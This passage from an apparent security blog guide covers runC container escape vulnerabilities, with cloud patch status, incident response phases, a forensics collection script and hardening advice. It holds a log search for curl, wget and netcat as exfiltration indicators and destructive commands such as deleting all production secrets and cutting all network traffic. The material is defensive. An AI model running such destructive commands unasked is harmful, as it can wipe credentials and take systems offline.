  --cluster=CLUSTER_NAME \
  --enable-autoupgrade
Azure
AKS:
- ✅ Patches available: November 8, 2025
- Node image version: 1.30.6-20251108
Azure Container Instances:
- ✅ Automatically patched: November 7, 2025
# Check AKS node image version
az aks show -n CLUSTER_NAME -g RESOURCE_GROUP \
  --query "agentPoolProfiles[].nodeImageVersion"

# Upgrade AKS cluster
az aks upgrade -n CLUSTER_NAME -g RESOURCE_GROUP \
  --kubernetes-version 1.30.6
DigitalOcean
DOKS (DigitalOcean Kubernetes):
- ✅ Automatic updates deployed: November 8, 2025
Droplets with Docker:
- Action: Manual update required via apt-get upgrade
Incident Response Procedures
If you suspect runC container escape exploitation:
Phase 1: Immediate Containment
# 1. Isolate affected Kubernetes nodes
kubectl cordon <affected-node>
kubectl drain <affected-node> --ignore-daemonsets --delete-emptydir-data --force --grace-period=0
# 2. Stop Docker daemon on affected hosts
ssh <affected-host>
sudo systemctl stop docker
sudo systemctl stop containerd

# 3. Disconnect affected hosts from network (if severe)
sudo iptables -P INPUT DROP
sudo iptables -P OUTPUT DROP
sudo iptables -P FORWARD DROP
Phase 2: Forensic Data Collection
#!/bin/bash
# forensics-collection.sh
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
EVIDENCE_DIR="/tmp/forensics_$TIMESTAMP"
mkdir -p "$EVIDENCE_DIR"

# Capture container state
docker ps -a > "$EVIDENCE_DIR/containers.txt"
docker inspect $(docker ps -aq) > "$EVIDENCE_DIR/container-configs.json"

# Capture system logs
journalctl -u docker --since "24 hours ago" > "$EVIDENCE_DIR/docker.log"
journalctl -u containerd --since "24 hours ago" > "$EVIDENCE_DIR/containerd.log"
dmesg > "$EVIDENCE_DIR/kernel.log"

# Capture mount information
mount > "$EVIDENCE_DIR/mounts.txt"
cat /proc/mounts > "$EVIDENCE_DIR/proc-mounts.txt"

# Capture network state
ss -tulpn > "$EVIDENCE_DIR/network-connections.txt"
iptables-save > "$EVIDENCE_DIR/iptables-rules.txt"

# Search for indicators of compromise
grep -rE "make-rshared|make-shared" /var/log/ > "$EVIDENCE_DIR/mount-manipulation.txt" 2>/dev/null
find / -name ".*" -type f -mtime -1 2>/dev/null > "$EVIDENCE_DIR/hidden-files-modified.txt"
ausearch -m avc -ts recent > "$EVIDENCE_DIR/selinux-denials.txt" 2>/dev/null

# Check for modified system files
rpm -Va > "$EVIDENCE_DIR/rpm-verify.txt" 2>/dev/null     # RHEL/CentOS
debsums -c > "$EVIDENCE_DIR/deb-verify.txt" 2>/dev/null  # Ubuntu/Debian

# Package evidence
tar -czf "forensics_$TIMESTAMP.tar.gz" -C /tmp "forensics_$TIMESTAMP"
echo "Forensic data collected: forensics_$TIMESTAMP.tar.gz"
Phase 3: Investigation
# Check for unauthorized user accounts
diff /etc/passwd /etc/passwd-
diff /etc/shadow /etc/shadow-

# Check for suspicious processes
ps aux | grep -v "\[" | awk '{if ($3>50) print $0}'  # High CPU (skips kernel threads)
pstree -p | grep docker                              # Docker child processes

# Check for persistence mechanisms
crontab -l -u root
cat /etc/cron.d/*
systemctl list-timers --all
find /etc/systemd/system -type f -mtime -1

# Check for exfiltrated data
find /var/log -name "*.log" -exec grep -lE "curl|wget|nc|netcat" {} \;
Phase 4: Remediation
# 1. Rotate all credentials
kubectl delete secret --all -n production
# Recreate from secure vault

# 2. Rebuild compromised nodes from clean images
kubectl delete node <compromised-node>
# Provision new node with patched runC

# 3. Rotate SSH keys
ssh-keygen -t ed25519 -f /root/.ssh/id_ed25519 -N ""
# Deploy new public key to authorized systems

# 4. Reset application secrets
# Rotate database passwords, API keys, TLS certificates
Key Takeaways
- Update Immediately: Patch runC to 1.2.8, 1.3.3, or 1.4.0-rc.3+
- Enable User Namespaces: Provides critical defense-in-depth even if escape succeeds
- Run Rootless Containers: Eliminates root privileges at the daemon level
- Enforce Pod Security Standards: Restrict privileged containers and dangerous capabilities
- Deploy Runtime Detection: Use Falco or eBPF-based monitoring for escape attempts
- Scan Container Images: Integrate vulnerability scanning in CI/CD pipelines
- Implement Network Segmentation: Prevent lateral movement after compromise
- Plan Incident Response: Have forensic collection and remediation procedures ready
Conclusion
The runC container escape vulnerabilities (CVE-2025-31133, CVE-2025-52565, CVE-2025-52881) represent a critical breach of the container isolation model that underpins cloud-native infrastructure. With patches now available and cloud providers actively deploying updates, immediate action is required to secure production workloads.
Container security cannot rely on isolation alone—defense-in-depth is mandatory. Combine runC patches with user namespaces, rootless containers, restrictive pod security policies, runtime monitoring, and network segmentation. Each layer reduces attack surface and limits blast radius if compromise occurs.
The container ecosystem is mature but not invulnerable. Continuous vigilance, rapid patching, and proactive hardening are essential to maintain security in production environments. Review your infrastructure today, deploy patches immediately, and implement the defense-in-depth controls outlined in this guide.
Additional Resources:
- runC GitHub Security Advisories
- Sysdig Threat Research: runC Vulnerabilities Deep Dive
- CISA Cybersecurity Advisory: Container Escape Vulnerabilities
- Kubernetes Pod Security Standards Documentation
- Falco Rules for Container Security
- Docker Security Best Practices
- NIST SP 800-190: Application Container Security Guide
Written by StaticBlock Editorial
StaticBlock Editorial is a technical writer and software engineer specializing in web development, performance optimization, and developer tooling.